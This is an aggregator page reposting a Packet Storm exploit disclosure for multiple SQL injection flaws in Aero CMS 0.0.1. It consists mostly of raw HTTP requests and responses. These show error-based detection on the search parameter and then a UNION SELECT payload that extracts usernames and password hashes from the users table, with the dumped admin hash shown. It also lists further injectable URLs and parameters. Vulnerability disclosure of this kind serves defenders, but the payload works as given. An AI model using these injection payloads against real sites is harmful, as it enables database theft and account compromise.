Headline

Aero CMS 0.0.1 SQL Injection

Aero CMS version 0.0.1 suffers from multiple remote SQL injection vulnerabilities. Original discovery of this issue in this version is attributed to nu11secur1ty in August of 2022.
1 year ago
Packet Storm
Open in Source
#sql #vulnerability #web #windows #apple #apache #git #php #auth #chrome #webkit #ssl
# Exploit Title: Aero CMS v0.0.1 - SQL Injection (no auth)# Date: 15/10/2022# Exploit Author: Hubert Wojciechowski# Contact Author: [email protected]# Vendor Homepage: https://github.com/MegaTKC/AeroCMS# Software Link: https://github.com/MegaTKC/AeroCMS# Version: 0.0.1# Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23## Example SQL Injection-----------------------------------------------------------------------------------------------------------------------Param: search-----------------------------------------------------------------------------------------------------------------------Req sql ini detect-----------------------------------------------------------------------------------------------------------------------POST /AeroCMS-master/search.php HTTP/1.1Host: 127.0.0.1Cookie: PHPSESSID=g49qkbeug3g8gr0vlsufqa1g57Origin: http://127.0.0.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Upgrade-Insecure-Requests: 1Referer: http://127.0.0.1/AeroCMS-master/Content-Type: application/x-www-form-urlencodedAccept-Language: en-US;q=0.9,en;q=0.8Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36Connection: closeCache-Control: max-age=0Content-Length: 21search=245692'&submit=-----------------------------------------------------------------------------------------------------------------------Res:-----------------------------------------------------------------------------------------------------------------------HTTP/1.1 200 OKDate: Sat, 15 Oct 2022 03:07:06 GMTServer: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40X-Powered-By: PHP/5.6.40Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0Pragma: no-cacheContent-Length: 3466Connection: closeContent-Type: text/html; charset=UTF-8[...]Query failed You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '%'' at line 1-----------------------------------------------------------------------------------------------------------------------Req-----------------------------------------------------------------------------------------------------------------------POST /AeroCMS-master/search.php HTTP/1.1Host: 127.0.0.1Cookie: PHPSESSID=g49qkbeug3g8gr0vlsufqa1g57Origin: http://127.0.0.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Upgrade-Insecure-Requests: 1Referer: http://127.0.0.1/AeroCMS-master/Content-Type: application/x-www-form-urlencodedAccept-Language: en-US;q=0.9,en;q=0.8Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36Connection: closeCache-Control: max-age=0Content-Length: 21search=245692''&submit=-----------------------------------------------------------------------------------------------------------------------Res:-----------------------------------------------------------------------------------------------------------------------HTTP/1.1 200 OKDate: Sat, 15 Oct 2022 03:07:10 GMTServer: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40X-Powered-By: PHP/5.6.40Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0Pragma: no-cacheConnection: closeContent-Type: text/html; charset=UTF-8Content-Length: 94216[...]-----------------------------------------------------------------------------------------------------------------------Req exploiting sql ini get data admin-----------------------------------------------------------------------------------------------------------------------POST /AeroCMS-master/search.php HTTP/1.1Host: 127.0.0.1Cookie: PHPSESSID=g49qkbeug3g8gr0vlsufqa1g57Origin: http://127.0.0.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Upgrade-Insecure-Requests: 1Referer: http://127.0.0.1/AeroCMS-master/Content-Type: application/x-www-form-urlencodedAccept-Language: en-US;q=0.9,en;q=0.8Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36Connection: closeCache-Control: max-age=0Content-Length: 113search=245692'+union+select+1,2,group_concat(username,char(58),password),4,5,6,7,8,9,10,11,12+from+users#&submit=-----------------------------------------------------------------------------------------------------------------------Res:-----------------------------------------------------------------------------------------------------------------------HTTP/1.1 200 OKDate: Sat, 15 Oct 2022 05:40:05 GMTServer: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40X-Powered-By: PHP/5.6.40Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0Pragma: no-cacheConnection: closeContent-Type: text/html; charset=UTF-8Content-Length: 101144[...]                    <a href="#">admin:$2y$12$0BgqODF66TD.JZxL5MVRlOEIvap9XzkBEMVEeHyHe6RiOxdGrx3Ne,admin:$2y$12$0BgqODF66TD.JZxL5MVRlOEIvap9XzkBEMVEeHyHe6RiOxdGrx3Ne</a>[...]-----------------------------------------------------------------------------------------------------------------------Other URL and params-----------------------------------------------------------------------------------------------------------------------/AeroCMS-master/admin/posts.php [post_title]/AeroCMS-master/admin/posts.php [filename]/AeroCMS-master/admin/profile.php [filename]/AeroCMS-master/author_posts.php [author]/AeroCMS-master/category.php [category]/AeroCMS-master/post.php [p_id]/AeroCMS-master/search.php [search]/AeroCMS-master/admin/categories.php [cat_title]/AeroCMS-master/admin/categories.php [phpwcmsBELang cookie]/AeroCMS-master/admin/posts.php [post_content]/AeroCMS-master/admin/posts.php [p_id]/AeroCMS-master/admin/posts.php [post_category_id]/AeroCMS-master/admin/posts.php [post_title]/AeroCMS-master/admin/posts.php [reset]
Packet Storm: Latest News

WordPress Really Simple Security Authentication Bypass
2 hours ago
Packet Storm
Palo Alto PAN-OS Authentication Bypass / Remote Command Execution
2 hours ago
Packet Storm
Ubuntu Security Notice USN-7116-1
3 hours ago
Packet Storm
Ubuntu Security Notice USN-7015-5
3 hours ago
Packet Storm
Ubuntu Security Notice USN-7114-1
3 hours ago
Packet Storm